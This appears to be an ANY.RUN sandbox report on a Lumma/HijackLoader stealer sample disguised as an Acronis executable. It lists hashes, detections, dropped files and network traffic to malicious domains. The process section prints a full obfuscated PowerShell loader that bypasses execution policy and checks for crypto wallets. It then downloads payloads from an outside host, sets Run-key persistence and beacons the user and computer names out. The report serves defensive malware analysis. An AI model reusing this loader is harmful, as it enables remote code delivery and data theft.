File name:

2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch

Full analysis: https://app.any.run/tasks/394a0c60-f5b5-43b3-af2f-4db53d21037c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 21, 2024, 03:46:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
stealer
crypto-regex
golang
pastebin
loader
autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 6 sections
MD5:

40F9287E828DB87DD3259B53585ADF31

SHA1:

6622AB252D7EB53C8204C9939E514C021B5B50D5

SHA256:

5EDFC69B348477464FBF4A9434F9FF3C361E818DD6FB40BDC5B99CA31E1C3D38

SSDEEP:

98304:sqTAWJqWt5uOveevUoJSKzzbNHsSM7/pKLqb/zsK+f97zP:fJ3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
    • Changes powershell execution policy (Bypass)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
      • powershell.exe (PID: 3040)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 1920)
      • powershell.exe (PID: 2040)
    • LUMMA has been detected (SURICATA)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3040)
    • Application launched itself

      • powershell.exe (PID: 3040)
    • Starts POWERSHELL.EXE for commands execution

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
      • powershell.exe (PID: 3040)
    • Executable content was dropped or overwritten

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3040)
    • The process executes Powershell scripts

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 3040)
    • Starts application with an unusual extension

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
    • Starts the AutoIt3 executable file

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
    • Found regular expressions for crypto-addresses (YARA)

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
  • INFO

    • Application based on Golang

      • 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe (PID: 5696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.3)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit, No debug
PEType: PE32
LinkerVersion: 3
CodeSize: 3499520
InitializedDataSize: 311808
UninitializedDataSize: -
EntryPoint: 0x4fa70
OSVersion: 4
ImageVersion: 1
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.109
ProductVersionNumber: 1.0.0.109
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: ASCII
CompanyName: Acronis International GmbH
FileDescription: Local GRPM mini
FileVersion: 1.0.0-109
LegalCopyright: Copyright (C) Acronis International GmbH, 2002-2024
LegalTrademarks: Acronis International GmbH. All rights reserved.
OriginalFileName: grpm-mini.exe
ProductName: Local GRPM mini
ProductVersion: 1.0.0-109
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start #LUMMA 2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs htakba.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
1920"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e $ o f b w = ' h K c U : \ S o f T w A r e \ C L A S s E s \ ' ;   $ K 2 T f z = ' c : \ p R o g R A M   F i l e s \ ' ;   $ n S k F 7 = 0 ;   $ 5 8 4 f = ( g E T - w M i O B J e C T   - C l a s S   W i N 3 2 _ c O m P U T E R S y s T e m ) . p A r T O f D o m A i n ;   $ X T U 8 = ' h k c U : \ s o f T w A r e \ ' ;   $ K i r H = ' H k L M : \ s o F t w A r E \ C l A S s e s \ ' ;   $ 5 t v Z P = $ e N v : L O c A l a p p d a T a + ' \ P R O G R A m s \ ' ;   $ v j T A = @ (   $ O f b W + ' A O p P ' ;   $ o f b W + ' k e E p k E Y ' ;   $ K i r H + ' B C v A u L T ' ;   $ 5 T V Z p + ' K e e P k E y - D e s K T o P \ k e E p k E y   D e s k T o p . e X E ' ;   $ x t U 8 + ' R E A L   s e c u r I T y \ B C V A u L T ' ;   $ o F b W + ' C y P h e R o c k ' ;   $ 5 t v Z P + ' T r E z O R   S U I T E \ t r E Z O r   S U I t E . e x E ' ;   $ x t u 8 + ' m I C R O s O f t \ w I n d o W S \ c U r r E N T v e r S I o N \ u n I n s t A L l \ b i T b O x A P p ' ;   $ 5 T v Z p + ' c y p H E R o c k   C Y s Y N C \ C Y P h E r o c k   C Y S y n C . e X e ' ;   $ K 2 T f z + ' B i T b o x \ B I t b o X . E x E ' ;   $ o F b W + ' o N e K E Y - w A l L e t ' ;   $ 5 t v z P + ' k e E V O - W A L L E T \ K e E V o   L I n k . e X E ' ;   $ o F B W + ' L I q U i D n e T w o R k ' ;   $ o F B W + ' t r e Z o R S U I t E ' ;   $ k 2 t F Z + ' b l o C K S T R e a M \ B l O c K s t R e a M   G R e e N \ B L O C k s t r E A M   G r e E n . e x E ' ;   $ k I r H + ' l e d g e r l i v e ' ;   $ X t u 8 + ' b I T b O x A p p ' ;   $ K 2 t F Z + ' O n E k e Y \ o n e K E y . e x E ' ;   $ o f B w + ' k E e V O ' ;   $ K 2 T f Z + ' B C   V a U L T \ B C v A U L t . E x E ' ;   $ 5 T v z p + ' r A b B Y - d E S K T o P \ r a B b Y   d e s k t o P . E x e ' ;   $ K 2 T F Z + ' L e d g e r   L i v E \ L e D G E r   l I V e . e X e ' ;   ) ;   $ r z Q a 5 = $ V J T a . L E N G t h ;   I F   ( $ 5 8 4 F )   { $ n S K f 7 = 1 }   e l S E   {   F o R   ( $ g k X l = 0 ;   $ g k X L   - l T   $ r Z q a 5   - a N d   $ n s k F 7   - E q   0 ;   $ g K x L + + )   {   i f   ( t e s t - p a T H   $ v J t a [ $ G k x L ] )   { $ n S K F 7 = 1 } ; } ; } ;   i F   ( $ n S K F 7   - E Q   1 )   {   [ n E T . s e R v I c e P O I N T m A N a g E R ] : : s E c U R i t Y p R O t O c o L   =   [ N e t . S E c u R i t y P R o t o C o l T y P e ] : : t L S 1 2 ;   $ U 9 s O t y = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / s n o w . z i p ' ;   $ y t B d 4 S = ' D e f r a g C l i e n t ' ;   C h D I R   $ E N V : a P p d a t A ;   $ J 8 f e q x r W = G E t - C O m M A n D   S T a r T - B i t S t r a N S f e r   - E R R O R a c t I O N   S i L E N T l y c O N T I N u E ;   $ W p h b A O q W = " { 0 } \ { 1 } "   - f   $ E n V : A p p d a t A ,   $ y t B d 4 S ;   T r Y   {   N e w - i T E m   - p a T h   $ e n V : A P p D a T A   - N A M E   $ y t B d 4 S   - i T e M T Y p E   ' d i r e c t o r y ' ;   A d d - T y p e   - A S S e m b l y n A m e   S y S t e M . I O . C o M p r E s S i O N ,   s Y S T e m . i o . C O M P r e s s i o n . f i l E S Y S T e m   - e R R O R a C t I O N   S I l e n t l Y c O n T I N u E ;   $ o T v Q T m T = ( C U R l   - U r i   $ U 9 s O t y   - U s E B A S I C P A R S I n g ) . c O n T e N t ;   $ u p K 3 8 6 = n E w - O b j e c t   s Y S T e m . i O . M E M O r Y s T r E A M ;   $ u p K 3 8 6 . w r i T e ( $ o T v Q T m T ,   0 ,   $ o T v Q T m T . L E N G t H ) ;   $ u p K 3 8 6 . s E E k ( 0 ,   [ S Y S T e M . I O . s e E k o r i G i n ] : : B E G i N )   |   o u T - N u l L ;   $ b 1 s a q q Q r = n E w - o b j E c t   s Y s t e M . I O . C O m P r E s S I O n . Z I p A r c H I v E ( $ u p K 3 8 6 ,   [ s Y S t E m . I o . c o M p R E s S I o n . Z I P a R c H I v E M O D E ] : : R e a d ) ;   f O R e A C h ( $ Z e Z q s H   i n   $ b 1 s a q q Q r . e n t r I E s )   {   $ B Y u c 8 M = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ Z e Z q s H . N a M E ;   $ 6 3 Y 3 r j 5 F = $ Z e Z q s H . o p e N ( ) ;   $ F 5 Y d W 8 F = [ S y s t e m . i o . f I L E ] : : C r e a T e ( $ B Y u c 8 M ) ;   $ 6 3 Y 3 r j 5 F . C o p Y t o ( $ F 5 Y d W 8 F ) ;   $ F 5 Y d W 8 F . c L o s e ( ) ;   $ 6 3 Y 3 r j 5 F . c l o S e ( ) ; }   $ b 1 s a q q Q r . d I s P O s E ( ) ;   $ u p K 3 8 6 . D i s P o S E ( ) ;   }   c a t c h   { N e w - i T E m   - P A T H   $ E n v : a P p D A t a   - n A M e   $ y t B d 4 S   - i t e m t y p e   ' d i r e c t o r y ' ;   $ I u 4 Z n 1 = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / ' ;   $ t I V p p k B = @ ( ' T C C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ,   ' c l i e n t 3 2 . e x e ' ,   ' n s m _ v p r o . i n i ' ,   ' n s k b f l t r . i n f ' ,   ' p c i c a p i . d l l ' ,   ' P C I C H E K . D L L ' ,   ' H T C T L 3 2 . D L L ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' N S M . L I C ' ,   ' c l i e n t 3 2 . i n i ' ,   ' P C I C L 3 2 . D L L ' ) ;   I F   ( $ J 8 f e q x r W )   {   $ t I V p p k B   |   F o r E A C H - o b j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = $ W p h b A O q W + ' \ ' + $ _ ;   S t a R t - b I t S T R A N s F e R   - s O u r C E   $ G 1 6 Q 4 a U   - D E S T I N a T i o N   $ J n s A 5 f x U ;   } ; }   e L s e   {   $ t I V p p k B   |   f O r e a c h - O B j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ _ ;   $ x Q f y 4 F e s = ' b I t s a D M I n . e X E   / t r A n S f e r   X 5 y 6 Y J   / d O W n L o A D   / P R i O r I T y   N O r m a l   ' + $ G 1 6 Q 4 a U + '   ' + $ J n s A 5 f x U ;   &   $ x Q f y 4 F e s ; } ;   } ;   } ;   $ 6 a L Z w U = G e t - I t E m   $ W p h b A O q W   - f o R C e ;   $ 6 a L Z w U . A t t R I B U T e s = ' H i d d e n ' ;   C d   $ W p h b A O q W ;   $ P K a T h x v 4 = $ W p h b A O q W ,   ' c l i e n t 3 2 . e x e '   - J O i n   ' \ ' ;   N e W - I t E M p R o P e R T y   - P a t H   ' h k C u : \ S O f t w a r E \ M I C R o S O f t \ W I N D O W S \ C u r R e n T v e R S I o N \ r u n '   - n A M e   $ y t B d 4 S   - V a L U e   $ P K a T h x v 4   - p R o P E R T y t y p e   ' S t r i n g ' ;   s T a R T   C L I E n T 3 2 . E X E ;   $ 3 2 H a O = p s   c l i e n t 3 2   - e r r o r a C t i O n   s i L e N T L y C O N t I n u e ;   $ S f b 0 = " h t t p s : / / s n o w q u e e n . s i t e / s n o w s / r e c a l l i n g . p h p ? c p n m e = $ E n v : c O M p u t e r N A M E & u s n m e = $ e n V : U s E r N A m E & p a r a m = " ;   I F   ( $ 3 2 H a O . i d )   {   $ q t f C D = $ S f b 0 + ' p H q B ' ;   W g e t   $ q t f C D   - u s E B A S I C p A r S I n G ; }   e l s e   {   $ q t f C D = $ S f b 0 + ' k z h U 2 ' ;   W g e t   $ q t f C D   - U s e b a s i c p a r S i N G ; } ;   } ; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2040powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2972"C:\Users\admin\AppData\Roaming\HTAKBA.com" "C:\Users\admin\AppData\Roaming\YCD7OD.bin"C:\Users\admin\AppData\Roaming\HTAKBA.com2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script (Beta)
Exit code:
0
Version:
3, 3, 15, 1
Modules
Images
c:\users\admin\appdata\roaming\htakba.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
3040powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5376\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5696"C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe" C:\Users\admin\Desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
explorer.exe
User:
admin
Company:
Acronis International GmbH
Integrity Level:
MEDIUM
Description:
Local GRPM mini
Exit code:
0
Version:
1.0.0-109
Modules
Images
c:\users\admin\desktop\2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll
6092\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 741
Read events
17 727
Write events
14
Delete events
0

Modification events

(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3040) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
1
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Roaming\YCD7OD.bin
MD5:
SHA256:
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04bvay3o.mvx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\FV7G1B3794XBRS1N5K65T1TJPK.ps1text
MD5:909DABB4B6591DDCBE2DF0395650DCCA
SHA256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\LNOKOK7ULD2D9QRT.exehtml
MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
SHA256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p1ol03i2.ajj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
56962024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exeC:\Users\admin\AppData\Local\Temp\KLF1UAJT1APXUZQG55I8RRRQYR.ps1text
MD5:EB8A82CF3676AEB10AF460E8A5049BE5
SHA256:B7E1DD2A46E27759D538B5A7C76BE23A8010FA5322E093259FA6100B10CF7D14
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_32jytxdb.2wt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1920powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bkjewxrv.bgp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2040powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:B6B36C1CF9C23D33D34BCDFFA440B802
SHA256:B484E946EF1102BEDE0ABD15476262BD2AAF9E651BD87993C48DA929DDA7CC10
2040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4zqhghep.304.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
30
DNS requests
14
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5544
RUXIMICS.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4932
svchost.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5544
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.96.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
15 b
malicious
POST
200
188.114.97.3:443
https://foresttrail.shop/api
unknown
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5544
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4932
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.23.209.182:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5544
RUXIMICS.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4932
svchost.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
www.bing.com
  • 2.23.209.182
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.133
whitelisted
google.com
  • 216.58.212.174
whitelisted
crl.microsoft.com
  • 2.16.164.9
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
foresttrail.shop
  • 188.114.97.3
  • 188.114.96.3
unknown
pastebin.com
  • 104.20.3.235
  • 172.67.19.24
  • 104.20.4.235
shared
cdn1.pixel-story.shop
  • 172.67.185.54
  • 104.21.32.85
unknown
silversky.club
  • 104.21.58.9
  • 172.67.167.196
malicious
zasa.r2cloudmikudau8.shop
  • 104.21.6.29
  • 172.67.154.155
unknown

Threats

PID
Process
Class
Message
5696
2024-11-21_40f9287e828db87dd3259b53585adf31_hijackloader_poet-rat_snatch.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
No debug info